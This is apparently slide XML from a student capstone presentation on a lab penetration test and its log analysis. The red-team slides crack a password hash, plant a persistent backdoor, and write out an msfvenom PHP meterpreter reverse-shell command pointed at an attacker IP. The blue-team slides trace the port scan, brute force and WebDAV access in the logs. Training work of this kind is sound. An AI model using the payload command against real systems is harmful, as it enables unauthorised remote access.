                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>secret_folder/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t> open file </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>connect_to_corp_server/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>which contains Ryan’s password hash</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Lato"/>
              <a:ea typeface="Lato"/>
              <a:cs typeface="Lato"/>
              <a:sym typeface="Lato"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317" name="Google Shape;317;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291725" y="3219625"/>
            <a:ext cx="1566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3</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Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>www.crackstation.net</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t> t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>o obtain Ryan’s password from the hash</a:t>
            </a:r>
            <a:endParaRPr sz="11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Exploitation: Firewall Misconfigurations</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323" name="Google Shape;323;p3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24" name="Google Shape;324;p3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Created and uploaded malicious msfvenom payload to shared WebDAV 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Established remote listener and executed a reverse shell on Capstone server by clicking on the malicious file we placed in the WebDAV folder through our web browser since Directory Listing is enabled for the site.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="326" name="Google Shape;326;p30"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="327" name="Google Shape;327;p3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28" name="Google Shape;328;p3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0"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="330" name="Google Shape;330;p3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31" name="Google Shape;331;p3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Obtained access to the root directory on the Capstone machine (192.168.1.105) and created  a persistent backdoor, allowing for continued access to the target machine. </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="334" name="Google Shape;334;p30"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="335" name="Google Shape;335;p3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36" name="Google Shape;336;p3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Evidence</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following command was used to create the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> shell.php payload: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i="1" lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.90 LPORT=55555 -f raw &gt; shell.php</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r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Full screenshots on next slide.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="9E9E9E"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="9E9E9E"/>
              </a:solidFill>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i="1" sz="1200">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339" name="Google Shape;339;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6436850" y="3812450"/>
            <a:ext cx="2371499" cy="4338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Evidence of Vulnerability: Firewall Misconfigurations</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="345" name="Google Shape;345;p31"/>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346" name="Google Shape;346;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2107375" y="768100"/>
            <a:ext cx="5689273" cy="1040800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="347" name="Google Shape;347;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2107378" y="1949773"/>
            <a:ext cx="1855000" cy="1433675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="348" name="Google Shape;348;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2107363" y="3459660"/>
            <a:ext cx="3673125" cy="1281390"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="349" name="Google Shape;349;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291725" y="644850"/>
            <a:ext cx="1566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1</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Create malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t> file using msfvenom</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Lato"/>
              <a:ea typeface="Lato"/>
              <a:cs typeface="Lato"/>
              <a:sym typeface="Lato"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="350" name="Google Shape;350;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291725" y="1909500"/>
            <a:ext cx="156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2</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Upload </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t>webdav/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
              <a:t> folder</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Lato"/>
              <a:ea typeface="Lato"/>
              <a:cs typeface="Lato"/>
              <a:sym typeface="Lato"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="351" name="Google Shape;351;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291725" y="3374975"/>
            <a:ext cx="1566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3</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Set up a remote listener and execute payload through browser to gain access to target machine</a:t>
            </a:r>
            <a:endParaRPr sz="11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357" name="Google Shape;357;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1687275"/>
            <a:ext cx="8595300" cy="88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358" name="Google Shape;358;p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Analysis: Identifying the Port Scan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="364" name="Google Shape;364;p33"/>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65" name="Google Shape;365;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="704825"/>
            <a:ext cx="8702100" cy="9717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Port scan occurred from 19:15 to 19:25</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-154940" lvl="0" marL="320040" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>A total of 1,105 packets were sent by Attacker IP 192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-154940" lvl="0" marL="320040" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>The sudden increase in amount of packets is a clear indicator. Further investigation into user agents provides us with the user agent "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)" </a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="366" name="Google Shape;366;p33"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="1752025"/>
            <a:ext cx="5481965" cy="3012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Analysis: Finding the Request for the Hidden Directory</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="372" name="Google Shape;372;p3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73" name="Google Shape;373;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="208050" y="741300"/>
            <a:ext cx="8302500" cy="345600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The hidden directory was discovered August 30, 2021 @ 19.55.09.000. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="374" name="Google Shape;374;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="284175" y="1141950"/>
            <a:ext cx="8406301" cy="1160800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="375" name="Google Shape;375;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="284175" y="3094834"/>
            <a:ext cx="8406300" cy="1765316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="Google Shape;376;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279775" y="2388825"/>
            <a:ext cx="837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10,143 requests were made to access the /secret_folder and /connect_to_corp_server files, one of which was successful and provided attacker with instructions for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>connecting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> to Webdav.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Analysis: Uncovering the Brute Force Attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="382" name="Google Shape;382;p3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83" name="Google Shape;383;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="645525"/>
            <a:ext cx="8409300" cy="416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384" name="Google Shape;384;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5187025" y="2263275"/>
            <a:ext cx="3641700" cy="971700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>14, 071 requests were made before the attacker discovered the password</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="385" name="Google Shape;385;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="505475" y="956025"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="386" name="Google Shape;386;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="517450" y="1986525"/>
            <a:ext cx="4355499" cy="1102100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387" name="Google Shape;387;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="964638" y="921538"/>
            <a:ext cx="34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b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>10,143 requests were made in the attack</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="388" name="Google Shape;388;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5110825" y="2406137"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="389" name="Google Shape;389;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4460200" y="769125"/>
            <a:ext cx="4135801" cy="1000525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="390" name="Google Shape;390;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="505475" y="3869162"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="391" name="Google Shape;391;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4252250" y="3462738"/>
            <a:ext cx="4281800" cy="1132762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="392" name="Google Shape;392;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1012325" y="3753400"/>
            <a:ext cx="281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Attacker discovered password on August 30, 2021 at 19:52:52</a:t>
            </a:r>
            <a:endParaRPr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Analysis: Finding the WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="398" name="Google Shape;398;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="128850" y="1701675"/>
            <a:ext cx="4246601" cy="2740051"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="399" name="Google Shape;399;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="88225" y="826775"/>
            <a:ext cx="8977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600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>45 requests were made to the /webdav/ directory to access shell.php and passwd.dav files</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="400" name="Google Shape;400;p36"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
